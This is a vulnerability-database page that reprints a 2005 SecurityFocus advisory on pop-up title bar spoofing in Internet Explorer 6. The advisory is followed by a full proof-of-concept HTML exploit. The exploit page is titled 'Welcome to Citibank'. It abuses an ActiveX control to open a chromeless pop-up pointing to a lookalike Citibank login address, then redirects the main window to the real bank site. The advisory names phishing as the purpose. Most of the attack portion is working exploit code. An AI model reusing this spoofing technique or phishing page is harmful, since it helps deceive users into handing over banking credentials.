Microsoft Internet Explorer 6 – Pop-up Window Title Bar Spoofing
漏洞ID | 1054918 | 漏洞类型 | |
发布时间 | 2005-02-21 | 更新时间 | 2005-02-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12602/info
Internet Explorer is reported prone to a pop-up window title bar spoofing weakness.
The weakness is reported to exist due to a flaw that manifests in script-initiated pop-up windows.
This issue may be leveraged by an attacker to display false URI information in the title bar of an Internet Explorer pop-up dialog window. This may facilitate phishing style attacks; other attacks may also be possible.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0014)about:internet -->
<html lang="x-klingon">
<head>
<title>Welcome to Citibank</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script type="text/javascript">
<!-- Begin
function shellscript()
{
window.focus();
pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
sP += 'menubar=0,resizable=0,width=315,';
sP += 'height=200,left = 250,top = 200'
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}
function main()
{
targetURL = 'http://citibank.com/us/index.htm';
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
location.replace(targetURL);
}
setTimeout(' main() ',1000);
// End -->
</script>
</head>
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
</body>
</html>
相关推荐: Cisco IOS 12.1 Large TCP Scan Denial of Service Vulnerability
Cisco IOS 12.1 Large TCP Scan Denial of Service Vulnerability 漏洞ID 1101907 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666